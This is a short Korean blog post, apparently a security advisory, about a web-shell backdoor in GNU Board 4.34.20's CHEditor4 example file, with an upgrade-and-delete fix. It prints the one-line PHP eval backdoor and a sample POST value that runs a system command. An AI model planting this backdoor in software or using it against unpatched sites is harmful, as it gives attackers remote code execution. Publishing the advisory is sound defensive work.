티스토리 뷰
GNU Board 그누보드 4.34.20 버젼 웹셀 삽입 취약점
/cheditor4/example/textarea.html 파일내 삽입
<?php @eval ($_POST[cheditor]); ?> |
공격자는 cheditor 변수에 POST 메소드를 전송하여 임의의 PHP 코드 실행 가능 (아래 참조)
name='cheditor' value="system('dir');"> |
해결책 : 그누보드 4.34.24 이상으로 업그레이드후 CHEditor4 디렉토리 삭제
- 최신 그누보드 설치디렉토리는 /cheditor4
gnuboard-4.34.20-webshell_report_20120509.pdf
'Security' 카테고리의 다른 글
Rootkit 설치 (0) | 2015.06.08 |
---|---|
리눅스 취약점검 (0) | 2015.06.08 |
Win32/Blaster.worm (블래스터 웜) (0) | 2015.06.08 |
Bourne Again Shell (Bash) 임의코드 실행 취약점 보안 업데이트 권고 사항 (0) | 2015.06.08 |
실행파일에 패스워드 (암호)를 걸어보자 (axcrypt) (0) | 2015.06.08 |
댓글
공지사항
최근에 올라온 글
최근에 달린 댓글
- Total
- Today
- Yesterday
링크
TAG
- GeoIP
- SSL
- pptp
- Apache
- MySQL
- WAF
- virtualbox
- ssh
- 리눅스
- galera
- ntp
- centOS7
- L2TP
- iptables
- centos8
- mariadb
- NGINX
- 베이어다이나믹
- HAProxy
- yum
- glusterfs
- gitlab
- 인증서
- cURL
- kvm
- IPSEC
- OpenVPN
- php
- mod_security
- softether
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | |||||
3 | 4 | 5 | 6 | 7 | 8 | 9 |
10 | 11 | 12 | 13 | 14 | 15 | 16 |
17 | 18 | 19 | 20 | 21 | 22 | 23 |
24 | 25 | 26 | 27 | 28 | 29 | 30 |
글 보관함